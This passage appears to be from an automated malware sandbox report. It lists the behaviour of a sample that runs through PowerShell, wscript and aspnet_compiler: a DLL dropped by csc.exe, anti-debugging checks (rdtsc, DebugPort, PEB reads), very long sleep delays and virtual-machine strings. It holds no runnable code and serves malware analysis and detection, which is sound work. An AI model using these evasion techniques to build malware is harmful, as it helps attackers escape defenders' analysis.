                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A2096E rdtsc 12_2_01A2096E
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6697
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2954
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3910
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5737
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe API coverage: 0.7 %
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5812 Thread sleep count: 6697 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5012 Thread sleep count: 2954 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4996 Thread sleep time: -10145709240540247s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3744 Thread sleep time: -23980767295822402s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 5088 Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                  Source: powershell.exe, 00000003.00000002.1813925745.0000000004C37000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
                  Source: wscript.exe, 00000006.00000003.1795848194.0000000004BD7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: powershell.exe, 00000003.00000002.1813925745.0000000004C37000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
                  Source: powershell.exe, 00000003.00000002.1818468127.000000000808F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1818468127.0000000008110000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                  Source: powershell.exe, 00000003.00000002.1813925745.0000000004C37000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
                  Source: powershell.exe, 00000007.00000002.2067606480.0000000007880000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process queried: DebugPort
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A2096E rdtsc 12_2_01A2096E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_00417063 LdrLoadDll, 12_2_00417063
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_019DA197 mov eax, dword ptr fs:[00000030h] 12_2_019DA197
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A9C188 mov eax, dword ptr fs:[00000030h] 12_2_01A9C188
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A20185 mov eax, dword ptr fs:[00000030h] 12_2_01A20185
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A84180 mov eax, dword ptr fs:[00000030h] 12_2_01A84180
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A6019F mov eax, dword ptr fs:[00000030h] 12_2_01A6019F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01AB61E5 mov eax, dword ptr fs:[00000030h] 12_2_01AB61E5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A101F8 mov eax, dword ptr fs:[00000030h] 12_2_01A101F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01AA61C3 mov eax, dword ptr fs:[00000030h] 12_2_01AA61C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A5E1D0 mov eax, dword ptr fs:[00000030h] 12_2_01A5E1D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A5E1D0 mov ecx, dword ptr fs:[00000030h] 12_2_01A5E1D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A10124 mov eax, dword ptr fs:[00000030h] 12_2_01A10124
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A8E10E mov eax, dword ptr fs:[00000030h] 12_2_01A8E10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A8E10E mov ecx, dword ptr fs:[00000030h] 12_2_01A8E10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A8A118 mov ecx, dword ptr fs:[00000030h] 12_2_01A8A118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A8A118 mov eax, dword ptr fs:[00000030h] 12_2_01A8A118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01AA0115 mov eax, dword ptr fs:[00000030h] 12_2_01AA0115
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_019E6154 mov eax, dword ptr fs:[00000030h] 12_2_019E6154
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019DC156 mov eax, dword ptr fs:[00000030h]12_2_019DC156
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A74144 mov eax, dword ptr fs:[00000030h]12_2_01A74144
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A74144 mov eax, dword ptr fs:[00000030h]12_2_01A74144
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A74144 mov ecx, dword ptr fs:[00000030h]12_2_01A74144
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A74144 mov eax, dword ptr fs:[00000030h]12_2_01A74144
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A74144 mov eax, dword ptr fs:[00000030h]12_2_01A74144
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A78158 mov eax, dword ptr fs:[00000030h]12_2_01A78158
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A780A8 mov eax, dword ptr fs:[00000030h]12_2_01A780A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AA60B8 mov eax, dword ptr fs:[00000030h]12_2_01AA60B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AA60B8 mov ecx, dword ptr fs:[00000030h]12_2_01AA60B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E208A mov eax, dword ptr fs:[00000030h]12_2_019E208A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A660E0 mov eax, dword ptr fs:[00000030h]12_2_01A660E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A220F0 mov ecx, dword ptr fs:[00000030h]12_2_01A220F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019DC0F0 mov eax, dword ptr fs:[00000030h]12_2_019DC0F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E80E9 mov eax, dword ptr fs:[00000030h]12_2_019E80E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A620DE mov eax, dword ptr fs:[00000030h]12_2_01A620DE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019DA0E3 mov ecx, dword ptr fs:[00000030h]12_2_019DA0E3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019FE016 mov eax, dword ptr fs:[00000030h]12_2_019FE016
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019FE016 mov eax, dword ptr fs:[00000030h]12_2_019FE016
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019FE016 mov eax, dword ptr fs:[00000030h]12_2_019FE016
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019FE016 mov eax, dword ptr fs:[00000030h]12_2_019FE016
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A76030 mov eax, dword ptr fs:[00000030h]12_2_01A76030
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A64000 mov ecx, dword ptr fs:[00000030h]12_2_01A64000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A82000 mov eax, dword ptr fs:[00000030h]12_2_01A82000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A82000 mov eax, dword ptr fs:[00000030h]12_2_01A82000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A82000 mov eax, dword ptr fs:[00000030h]12_2_01A82000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A82000 mov eax, dword ptr fs:[00000030h]12_2_01A82000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A82000 mov eax, dword ptr fs:[00000030h]12_2_01A82000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A82000 mov eax, dword ptr fs:[00000030h]12_2_01A82000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A82000 mov eax, dword ptr fs:[00000030h]12_2_01A82000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A82000 mov eax, dword ptr fs:[00000030h]12_2_01A82000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019DA020 mov eax, dword ptr fs:[00000030h]12_2_019DA020
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019DC020 mov eax, dword ptr fs:[00000030h]12_2_019DC020
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E2050 mov eax, dword ptr fs:[00000030h]12_2_019E2050
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A0C073 mov eax, dword ptr fs:[00000030h]12_2_01A0C073
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A66050 mov eax, dword ptr fs:[00000030h]12_2_01A66050
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019D8397 mov eax, dword ptr fs:[00000030h]12_2_019D8397
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019D8397 mov eax, dword ptr fs:[00000030h]12_2_019D8397
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019D8397 mov eax, dword ptr fs:[00000030h]12_2_019D8397
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019DE388 mov eax, dword ptr fs:[00000030h]12_2_019DE388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019DE388 mov eax, dword ptr fs:[00000030h]12_2_019DE388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019DE388 mov eax, dword ptr fs:[00000030h]12_2_019DE388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A0438F mov eax, dword ptr fs:[00000030h]12_2_01A0438F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A0438F mov eax, dword ptr fs:[00000030h]12_2_01A0438F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E83C0 mov eax, dword ptr fs:[00000030h]12_2_019E83C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E83C0 mov eax, dword ptr fs:[00000030h]12_2_019E83C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E83C0 mov eax, dword ptr fs:[00000030h]12_2_019E83C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E83C0 mov eax, dword ptr fs:[00000030h]12_2_019E83C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EA3C0 mov eax, dword ptr fs:[00000030h]12_2_019EA3C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EA3C0 mov eax, dword ptr fs:[00000030h]12_2_019EA3C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EA3C0 mov eax, dword ptr fs:[00000030h]12_2_019EA3C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EA3C0 mov eax, dword ptr fs:[00000030h]12_2_019EA3C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EA3C0 mov eax, dword ptr fs:[00000030h]12_2_019EA3C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EA3C0 mov eax, dword ptr fs:[00000030h]12_2_019EA3C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A163FF mov eax, dword ptr fs:[00000030h]12_2_01A163FF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A9C3CD mov eax, dword ptr fs:[00000030h]12_2_01A9C3CD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A663C0 mov eax, dword ptr fs:[00000030h]12_2_01A663C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019FE3F0 mov eax, dword ptr fs:[00000030h]12_2_019FE3F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019FE3F0 mov eax, dword ptr fs:[00000030h]12_2_019FE3F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019FE3F0 mov eax, dword ptr fs:[00000030h]12_2_019FE3F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8E3DB mov eax, dword ptr fs:[00000030h]12_2_01A8E3DB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8E3DB mov eax, dword ptr fs:[00000030h]12_2_01A8E3DB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8E3DB mov ecx, dword ptr fs:[00000030h]12_2_01A8E3DB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8E3DB mov eax, dword ptr fs:[00000030h]12_2_01A8E3DB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F03E9 mov eax, dword ptr fs:[00000030h]12_2_019F03E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F03E9 mov eax, dword ptr fs:[00000030h]12_2_019F03E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F03E9 mov eax, dword ptr fs:[00000030h]12_2_019F03E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F03E9 mov eax, dword ptr fs:[00000030h]12_2_019F03E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F03E9 mov eax, dword ptr fs:[00000030h]12_2_019F03E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F03E9 mov eax, dword ptr fs:[00000030h]12_2_019F03E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F03E9 mov eax, dword ptr fs:[00000030h]12_2_019F03E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F03E9 mov eax, dword ptr fs:[00000030h]12_2_019F03E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A843D4 mov eax, dword ptr fs:[00000030h]12_2_01A843D4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A843D4 mov eax, dword ptr fs:[00000030h]12_2_01A843D4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019DC310 mov ecx, dword ptr fs:[00000030h]12_2_019DC310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1A30B mov eax, dword ptr fs:[00000030h]12_2_01A1A30B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1A30B mov eax, dword ptr fs:[00000030h]12_2_01A1A30B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1A30B mov eax, dword ptr fs:[00000030h]12_2_01A1A30B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A00310 mov ecx, dword ptr fs:[00000030h]12_2_01A00310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8437C mov eax, dword ptr fs:[00000030h]12_2_01A8437C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A62349 mov eax, dword ptr fs:[00000030h]12_2_01A62349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A62349 mov eax, dword ptr fs:[00000030h]12_2_01A62349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A62349 mov eax, dword ptr fs:[00000030h]12_2_01A62349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A62349 mov eax, dword ptr fs:[00000030h]12_2_01A62349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A62349 mov eax, dword ptr fs:[00000030h]12_2_01A62349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A62349 mov eax, dword ptr fs:[00000030h]12_2_01A62349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A62349 mov eax, dword ptr fs:[00000030h]12_2_01A62349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A62349 mov eax, dword ptr fs:[00000030h]12_2_01A62349
